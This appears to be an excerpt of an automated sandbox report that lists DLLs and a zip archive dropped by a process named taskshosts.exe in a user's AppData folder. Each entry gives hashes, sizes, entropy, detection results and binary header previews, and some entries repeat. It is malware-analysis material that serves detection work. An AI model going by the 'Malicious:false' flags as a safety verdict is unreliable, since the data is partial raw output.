                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+...+...+...S$..+...^...+...^...+...^...+...^...+..J^...+...^...+...@...+...+...*..J^...+..J^...+..J^H..+..J^...+..Rich.+..........PE..L....:-a...........!.........P...............................................P............@.............................d...D................................ ..|#..(...T...............................@............................................text............................... ..`.rdata..............................@..@.data....K.......H..................@....rsrc...............................@..@.reloc..|#... ...$..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20712
                                                                                                                                            Entropy (8bit):6.48424389358467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tD3fFhe0IjmyvNNdeTpI8DwzH6oDG4y8mKFcQhHI4:Jdhe9mTpI8DwzH1DG4yjehHI4
                                                                                                                                            MD5:2C4DBAA2151C458C8EEA5F37B2CFE673
                                                                                                                                            SHA1:72AEB5DE5E25E67F8F798AED198718B9C4A5CD97
                                                                                                                                            SHA-256:99DD17FE2D43ED007B301AA5CE80364F2C7D9BBD033E4CE0166DEFB23140DB38
                                                                                                                                            SHA-512:399491B8D9736732E404640216C8ECE073795F9966AE6D2ACFD6D64B7C6B35AB63C03287751C0AB46593B072C778E1D4051D667BA693ADBAFE0A15AE6E6019AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9...9...9...0.!.;...k..;...k..2...k..3...k..8......;...-...<...9..........8......8.....M.8......8...Rich9...........................PE..L...x:-a...........!................P........0...............................p......TU....@..........................5..L...,6..x....P...............4.......`..P....1..T...........................p1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..P....`.......0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):799949
                                                                                                                                            Entropy (8bit):5.485927763898022
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24576:1K738OQQcosQNRs54PK4ItIVwHLfVEhIESC/:1K738OfcosQNRs54PK4I7q
                                                                                                                                            MD5:A6277EDD815F1D33215C41309AA0A3B4
                                                                                                                                            SHA1:0522D880992F2BB46571E27610410A9D99B69984
                                                                                                                                            SHA-256:A6E24DEAB93CA92BB3118081E10987FB7078B0D249E38911BD0C429563941317
                                                                                                                                            SHA-512:AE83607B951996CC61BFC07AA6946BC8E6B409BC504AA92355C762420ECE2D69C2E11BB6C88D4CE81C8D0136AC82E1E04157ED02CDCA5B7D945D939D36C4AE39
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:PK..........!...#............_bootlocale.pyca.......C.O.o..v.....................@....x...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nHz.e.j...W.n2..e.yh......e.e.d...rZd.d.d...Z.n.d.d.d...Z.Y.n.0.d.d.d...Z.d.S.)...A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C........t.j.j.r.d.S.t.....d...S.).N..UTF-8.........sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r......_bootlocale.py..getpreferredencoding...............r......getandroidapilevelc....................C........d.S.).Nr....r....r....r....r....r....r...............c....................C........t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r......r....r....r......localer......r....r....r....r....r....r.....................c....................C....6...|.r.J...t.j.j.r.d.S.t...t.j...}.|.s2t.j.d.k.r2d.}.|.S.).Nr......darwin..r....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2265336
                                                                                                                                            Entropy (8bit):6.107347147299583
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:49152:Tzq7OrIUW5FPdtvxE8IRHKY1CPwDv3uFfJuJy:Xq7OzUdfE8AHKY1CPwDv3uFfJ/
                                                                                                                                            MD5:31C2130F39942AC41F99C77273969CD7
                                                                                                                                            SHA1:540EDCFCFA75D0769C94877B451F5D0133B1826C
                                                                                                                                            SHA-256:DD55258272EEB8F2B91A85082887463D0596E992614213730000B2DBC164BCAD
                                                                                                                                            SHA-512:CB4E0B90EA86076BD5C904B46F6389D0FD4AFFFE0BD3A903C7FF0338C542797063870498E674F86D58764CDBB73B444D1DF4B4AA64F69F99B224E86DDAF74BB5
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.w9g..jg..jg..jn..js..j5..ke..j5..kl..j5..km..j5..km..js..kl..jg..j...j1..k...j1..kf..j1..jf..j1..kf..jRichg..j........................PE..L.....'a...........!.................f.......0................................#......"...@..............................h....!.T.....!.|............t".......".........8...............................@.............!..............................text...9........................... ..`.rdata...(...0...*..................@..@.data...4Y...`!......B!.............@....idata........!......X!.............@..@.00cfg........!......r!.............@..@.rsrc...|.....!......t!.............@..@.reloc........"......|!.............@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):29208
                                                                                                                                            Entropy (8bit):6.643623418348
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                                                                                                                                            MD5:BC20614744EBF4C2B8ACD28D1FE54174
                                                                                                                                            SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                                                                                                                                            SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                                                                                                                                            SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):544504
                                                                                                                                            Entropy (8bit):5.7541372304412945
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:OcwAbgOL9BmDy2pMcdmka42bJ8Hh9sa3MU2lvzJp:O4UOBBcF2b0hma8U2lvzJp
                                                                                                                                            MD5:8471E73A5594C8FBBB3A8B3DF4FB7372
                                                                                                                                            SHA1:488772CB5BBB50F14A4A9546051EDEF4AE75DD20
                                                                                                                                            SHA-256:380BB2C4CE42DD1EF77C33086CF95AA4FE50290A30849A3E77A18900141AF793
                                                                                                                                            SHA-512:24025B8F0CC076A6656EBA288F5850847C75F8581C9C3E36273350DB475050DEEE903D034AD130D56D1DEDE20C0D33B56B567C2EF72EB518F76D887F9254B11B
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............^..^..^..E^..^..._..^..._..^..._..^..._..^..._..^..._..^..^9..^..._...^..._..^..)^..^..._..^Rich..^................PE..L...,.'a...........!.........4.......".......................................p...........@.........................`,...N........... ..s............2.......0...6......8...............................@............................................text...y........................... ..`.rdata..jj.......l..................@..@.data....;.......6...p..............@....idata...A.......B..................@..@.00cfg..............................@..@.rsrc...s.... ......................@..@.reloc..$>...0...@..................@..B................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):180968
                                                                                                                                            Entropy (8bit):6.670082335019216
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:lGGzH3PDa4Wa0hDVgoApEmP/JZR8x4Hm6EJNA3Rui/IddZaUTlI8BhNjV:xzH24Wa01AEa/JZVGDNA3Rui/AaUTbjV
                                                                                                                                            MD5:46C68BBCA8A86EA6AD9B0279DED140D4
                                                                                                                                            SHA1:1FA89E41A77C5BD30799B28BBE7B2FF6FCE5183A
                                                                                                                                            SHA-256:00DF0F266070208D7087D203F5FD06E91C47C9D5C8ED449690B9443F06C8D992
                                                                                                                                            SHA-512:E75E082FBFF3FA9B9848CA5693DE0D4C5074995F9E03EEDD26FC72C90FBD9D60E257E6ECE93F2A113C6DF6401930451DF462FD8D16D14E0D249A8BEB2055D0CB
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,...,...,.....,...-...,...)...,...(...,.../...,.X.-...,...-...,...-...,.X.$...,.X.,...,.X.....,.X.....,.Rich..,.........PE..L...u:-a...........!................E........ ............................................@..........................j..P...0k...................................$..(f..T............................f..@............ ...............................text............................... ..`.rdata...W... ...X..................@..@.data...h............j..............@....rsrc................v..............@..@.reloc...$.......&..................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4497640
Entropy (8bit):6.725954872872607
Encrypted:false
SSDEEP:49152:6UqQgnAHhsvhRLEmgRJEqdaNIuEBIv0BX+dCIqQKHaEMZnFPqYekTr+4mP6umenF:oaWhxKCqBI2O9qTHrMZ0Yu1P7n3zFX
MD5:5BAFE23107E6DF19DE8F7AC9068ED26E
SHA1:D2A88BEAF959BD5331948B03330C98FE8FA85C7C
SHA-256:C1E5A847AE6AA9D9F42B482C7A20DCDC9DFE225F7186B0B01924225AA4E5E581
SHA-512:1C2372DEBC0E2E53EA281798F15243294430E4E7E4D3B82E4AB998A1B7C77CAD68D50E196E37C6FF7BA83B08A12286AF5D2797BFA707AF5DAD180862CCE7EFC7
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):25320
Entropy (8bit):6.533727727613444
Encrypted:false
SSDEEP:768:KtbCEbBS3sEnqhrVusklI8mGgDG4yjshHZ:8bB4qNVusklI8mGsyjYZ
MD5:E03B622ACBA9D02DC5A10364824EDE8C
SHA1:40DB1A1A0D81C5D165D043502B1205B22BC238A4
SHA-256:DE914028BFDDF19EF7279F04C92EF118C59B1BA8B5E27C76A7932E086BBC7978
SHA-512:02ABE8C060A2E046E92DB4FDF5EFDEAF6A870703AD313D14D3E8A3A308CCA032C1D7B7AC40B0C346C0D8BF3193C42DFC69BF50450C9545D6BB6704FC0F5D3D5B
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1115880
Entropy (8bit):5.387181050869946
Encrypted:false
SSDEEP:12288:D13VQCb5Pfhnzr0ql9L8kUMmuZ63NKM7IRG5eeIDe6VZyrIBHdQLhfFE+Ck5t:D13jZV0m9suVMMREtIC6Vo4u8k5t
MD5:FED3EC3AE0C349D65C0E90025B5507E6
SHA1:3A1864A89C90D2837B77C6A1881263E9764FF8D3
SHA-256:CE67BBA9B38FC6023D8EFDB06223B823CEB5B7C316DA48EA1EC9E404D05384A4
SHA-512:87047F4B55C43D59FCD643879CC2CC6D03E18963E36D6C3F49AB37C8B8672B31F61ABD9AC1FAD732778FD02FB3D1E5308572C0297FB51E2FF7C8A26354C54C58
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):76168
Entropy (8bit):6.763747567766442
Encrypted:false
SSDEEP:1536:O6HuqvERNjBwySXtVaSvrgOFw9RxKMnMecbCIdFr:O6HZMRNjKySdLcOiHMecbCId
MD5:31CE620CB32AC950D31E019E67EFC638
SHA1:EAF02A203BC11D593A1ADB74C246F7A613E8EF09
SHA-256:1E0F8F7F13502F5CEE17232E9BEBCA7B44DD6EC29F1842BB61033044C65B2BBF
SHA-512:603E8DCEDA4CB5B3317020E71F1951D01ACE045468EAF118B422F4F44B8B6B2794F5002EA2E3FE9107C222E4CB55B932ED0D897A1871976D75F8EE10D5D12374
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):59112
Entropy (8bit):6.494573911771512
Encrypted:false
SSDEEP:1536:qufUQUmEd6LO3wKb/Oz+B7RgjtWZhI8YnFcCByjWH:qWzlErbWI7RgjtWZhI8Yn2mH
MD5:24B4C187E01530FA52F71DA2D158178C
SHA1:C1AC16956FD2A2AE9209FD83E27D590306F959B0
SHA-256:62744AA604A54F38EA4C5A5C538B51AB2F81EB14175101EB1D0E4381B33F996B
SHA-512:DCA850EDC23923E69212A4786CF6CB4B9BA3BB3D931667848232A0975717FB3ED396265D787EC1D4992288C3FEFE2B700AA1FDC41361AD8D568B43EFF29B0A6E
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):78568
Entropy (8bit):6.692548823172262
Encrypted:false
SSDEEP:1536:2whkLX4/bkMzMIXSycT+ar1AS8bVMS4BpI8MV55CbyjvU:25LEkMzvX2DOlbVMS4BpI8MVeWU
MD5:9137B258EAF602482EB7DFDEEDFDF795
SHA1:4AA311984C98ACF024AC446C434905864E7BBBEB
SHA-256:3FF08CFA9F6687D68D78FE1A5C0AF6E5396E6FE506C14D23C538316CCA71A6AB
SHA-512:79493AB0254A6CB56F998BBBC63F5D471E0A3F8709E745EE0EB0DF5D8DC6222EF38EA262A97907BB06281B3E8D6572286A0DF5E8D82F984878263720F0FCB8E6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):116968
Entropy (8bit):6.58820716147258
Encrypted:false
SSDEEP:3072:qeLRlXrhZu6mLXV0Q/Z6flqCBAlI8BPW8srEy:qeLrX9JiCQ/Z6fMC6uEy
MD5:DE2F88B18FABE8586C38074B6FB80873
SHA1:CF4B533FFEB9792B33516EC05D3375260FF32B98
SHA-256:F5480114CF3118E561C4DC55CB733F9D06FAE897875D91BB324263B4AEDD31B9
SHA-512:3D89CCC9F9D6BCA35F2CE5DBDAFF2FD571C3E4C89056AEC4DE97466AEA49D5BD9C7DE0A0D345F249F1A33B43597F9C3A1687DA246F6C832434391638A10DCD04
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):230632
Entropy (8bit):6.857972259618523
Encrypted:false
SSDEEP:6144:7+CdBO+WLvRxuFcQAHe0nDx3tUftGuq6xx3XMW5gZrWCi7:7/7O/LRxuFcQYlDx3taLOWCw
MD5:334D5A5D7B73C7D157762EB290F3AC48
SHA1:716AE2CE10270CB474A6B1787E5C98662AE902EC
SHA-256:0AB918574B6404FC37B577E2FDDA8B1515FBF198E86C10C6011F708E88A79EF7
SHA-512:E830002BD4DDA7D55A1807EA2380A3A46BEF6CAF7DFA5D5028306076EA3B3BF56446196842B926D77244B8B7571AC489109737D0C5F8855896202D376F39297A
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):52456
Entropy (8bit):6.648093374061067
Encrypted:false
SSDEEP:768:GFRegVllNvo/j+X+oOPCGGtQhI8YIHezUl9wJDG4y3hHA:GRegvre+Or6GGChI8YIHr2yFA
MD5:3AD5E39CBE6354BB1CE82E29D4B2C072
SHA1:C4A18CE9E803CA6A7E33F1BEF422F5006DF651FF
SHA-256:EDDEEDD5FD8A1C49ECAAB51FF5117D9FB1FED5637E8CA31F35698BC6D68CA39D
SHA-512:A9ECAB892469C79B50B7C1C79394BB96FCB10BEAB03114961BE5C0C05622765C0F105856065988ED31A7D21911D91C7A5FCDF4A9D33AC35AB99BA5550E91A823
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):162536
Entropy (8bit):6.9618412972272035
Encrypted:false
SSDEEP:3072:KsdGFMyIenRQWtwjETZZ2lHEH60E9DjX9WAiuwCpMxIl3YxIuG17lzHfq9mNoRGU:Ky56RQWtwjEODjX/gQl3HtiYOc7IqvXu
MD5:02A95C6BD7852E9E5FAF24A3375D30EA
SHA1:5DAD699FD8103183B7A5E8B06498D8F6997A8898
SHA-256:E1B8C6D535E5070BB350799953A86AE7FF25FE90CEC81E20A18834CB6D503465
SHA-512:CE28BA0A7C6EFF792CC8E2B9A9A9C3357A82AB0FBDC5B02837CED666CF543D41E79503AD1155D96B412D85484174DAE5DDA6B5C33A5EEC62606CCB95720E43F8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,...B...B...B.......B...C...B...G...B...F...B...A...B...C...B...C...B...C...B...J...B...B...B.......B...@...B.Rich..B.................PE..L....:-a...........!................[.....................................................@..........................D..L....D..x....`...............^.......p..D....?..T...........................8@..@............................................text............................... ..`.rdata.............................@..@.data...`....P.......B..............@....rsrc........`.......F..............@..@.reloc..D....p.......P..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27368
                                                                                                                                            Entropy (8bit):6.549414263488397
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:HuDBfF4Cz7UfVqH+JxI8At42uDG4yjc/AdiYhHZ:Hu9fF4CPUfVqH+JxI8At42ayjc/ai8Z
                                                                                                                                            MD5:DD1C9450E9F4C33E47C364900D9A814D
                                                                                                                                            SHA1:E0BCD7DE6DF954309F226CA64390E95E41CECC69
                                                                                                                                            SHA-256:734AC43FD0DB3108D4BF1251F078F8F212B3B9A2DE1C46511AF7D6CA90EAF624
                                                                                                                                            SHA-512:A084F8119B99977077E3FE7B4E87722A2FE6D2C010604CFE4CE4E7A37AA621C2F974485700C969443E1B6C9AD466858607A239CC6DAD8668ECB7B61AFE98B19A
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........pb..1..1..1..1..1...0...1...0..1...0..1...0...1v..0...1...0..1..1...1v..0...1v..0..1v..1..1v..0..1Rich..1........................PE..L...m:-a...........!....."...,......:........@............................................@.........................`J..`....J.......p...............N..........T....E..T............................F..@............@..d............................text...g!.......".................. ..`.rdata.......@.......&..............@..@.data...@....`.......:..............@....rsrc........p.......>..............@..@.reloc..T............H..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):39144
                                                                                                                                            Entropy (8bit):6.594969794994295
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:fSq/1fbtTv2JknGAeTP5M8IYWn06IzLnnI9I8ttQDG4yfGhHl:KmD22nGNTxUn06IzLnI9I8ttcy+l
                                                                                                                                            MD5:A9E77439A38E66AB21DA99C5C00EE0F0
                                                                                                                                            SHA1:CD3CC2BEB2C5270F9A01BF95919C3F9C4A1F16D6
                                                                                                                                            SHA-256:70538FFEFDB2F6FF8C6F29EEAF5EE4197832E83476EAC6A648A4EB14E86E90FF
                                                                                                                                            SHA-512:5E5B27ECF6850EA7A300267B0B5EEB6F85AD003E9EE8FD13EB9B6350BD520295407D1F99BC33833A4BE1E78F4914B52F8ABC3C1F4297268B151DA1DD31BB10D3
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h.P..i...i...i..q....i..|h...i..|l...i..|m...i..|j...i.{|h...i..bo...i..bh...i...h...i.{|a...i.{|i...i.{|....i.{|k...i.Rich..i.........PE..L...m:-a...........!.....<...@.......<.......P...........................................@......................... i..X...xi.......................|..............\d..T............................d..@............P...............................text...o;.......<.................. ..`.rdata...$...P...&...@..............@..@.data...$............f..............@....rsrc................j..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):26344
                                                                                                                                            Entropy (8bit):6.465416851591826
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:cxz3Uvcqwbv6rhCGJklI8mU5DG4yihH8F:ct3UUqQyhCGJklI8mU7y68F
                                                                                                                                            MD5:A76C599AEA04E05E0D8FBD3E40C564FF
                                                                                                                                            SHA1:BD0992D395D4E2FD275C942DFA425A29333663BB
                                                                                                                                            SHA-256:5A9E30C9B0FC28E192B59930D70D4B212DBD96A14DE31D88B6F7E5C719E7B148
                                                                                                                                            SHA-512:1E3536C3F5DC439547C6F267A8F7F885E9B7F20F2A480B88DA83CB1336E25132BC4107F3C22F3FB7DE85FE762BC28D57182CF9A8CA881B3512905B1D5F5EAC66
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R..S..R..W..R..V..R..Q..R.h.S..R...S..R..S.R.h.Z..R.h.R..R.h...R.h.P..R.Rich.R.........................PE..L...o:-a...........!.........*...............0.......................................W....@......................... =..L...l=..d....`...............J.......p..l...H8..T............................8..@............0...............................text...9........................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....rsrc........`.......<..............@..@.reloc..l....p.......F..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):71912
                                                                                                                                            Entropy (8bit):6.6304829026661345
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:XxYZ+3edCVrMD9f8+2eJiWnnCz6xlI8Bwvyj+u:BYZLdsMD9f8LeJiWnCz6xlI8Bwru
                                                                                                                                            MD5:6BA36034BC861F44E90F547C667DA40A
                                                                                                                                            SHA1:7FC6D70AC9C80E600B14760B47396369F1C3D9BE
                                                                                                                                            SHA-256:5A3E41A8C91EB5D81AC9D4A7477461414D5431754FFB9D6AD49369238D25FDD4
                                                                                                                                            SHA-512:AD49EBE8B11592088CCFDA6813DE3629C1C0EF6663D56724B6DB8F5B6B827B8CF28EF71DD7154C223F836059029CD25FF48E57EDB3D9B665157716172443B59F
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y...=.=.=.4...9.o...?.o...1.o...7.o...<.....?.)...:.=.......<.....<...q.<.....<.Rich=.........................PE..L....:-a...........!.....x..........4w.......................................0......uJ....@.............................P.................................... ..........T...............................@............................................text....v.......x.................. ..`.rdata...`.......b...|..............@..@.data...@...........................@....rsrc...............................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143080
                                                                                                                                            Entropy (8bit):6.491073634171029
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:Dd7tm9Bt+CDEcthX+w0/13yLjqvDWb56j8RpI8M7Y8IVQ:Ddxm9Xr+w0/13+qvDWba8R3LQ
                                                                                                                                            MD5:EEFFC18404F7E10E6BFC71C5984EA3E5
                                                                                                                                            SHA1:9291C1DD62135F7FDCD61DDE80EB4B2E8B96CA0A
                                                                                                                                            SHA-256:52891F8A9751C1DED6DEA7C7313F19287E936A248AFFDBE93BC9C857294C120B
                                                                                                                                            SHA-512:C4D1FE321B457EF4BA0E79E0B22DF62D3D981C9A42A29FD8370559FEFEE225BFE21F398DE2BB58C0E91468ED87D5FDB804A605B76204B99C9F88713F67A49B41
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...+...+...+...S$..+...^...+...^...+...^...+...^...+..J^...+...^...+...@...+...+...*..J^...+..J^...+..J^H..+..J^...+..Rich.+..........PE..L....:-a...........!.........P...............................................P............@.............................d...D................................ ..|#..(...T...............................@............................................text............................... ..`.rdata..............................@..@.data....K.......H..................@....rsrc...............................@..@.reloc..|#... ...$..................@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20712
                                                                                                                                            Entropy (8bit):6.48424389358467
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tD3fFhe0IjmyvNNdeTpI8DwzH6oDG4y8mKFcQhHI4:Jdhe9mTpI8DwzH1DG4yjehHI4
                                                                                                                                            MD5:2C4DBAA2151C458C8EEA5F37B2CFE673
                                                                                                                                            SHA1:72AEB5DE5E25E67F8F798AED198718B9C4A5CD97
                                                                                                                                            SHA-256:99DD17FE2D43ED007B301AA5CE80364F2C7D9BBD033E4CE0166DEFB23140DB38
                                                                                                                                            SHA-512:399491B8D9736732E404640216C8ECE073795F9966AE6D2ACFD6D64B7C6B35AB63C03287751C0AB46593B072C778E1D4051D667BA693ADBAFE0A15AE6E6019AA
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}..9...9...9...0.!.;...k..;...k..2...k..3...k..8......;...-...<...9..........8......8.....M.8......8...Rich9...........................PE..L...x:-a...........!................P........0...............................p......TU....@..........................5..L...,6..x....P...............4.......`..P....1..T...........................p1..@............0...............................text............................... ..`.rdata.......0......................@..@.data........@.......$..............@....rsrc........P.......&..............@..@.reloc..P....`.......0..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\AppData\Local\Programs\Common\taskshosts.exe
                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):799949
                                                                                                                                            Entropy (8bit):5.485927763898022
                                                                                                                                            Encrypted:false
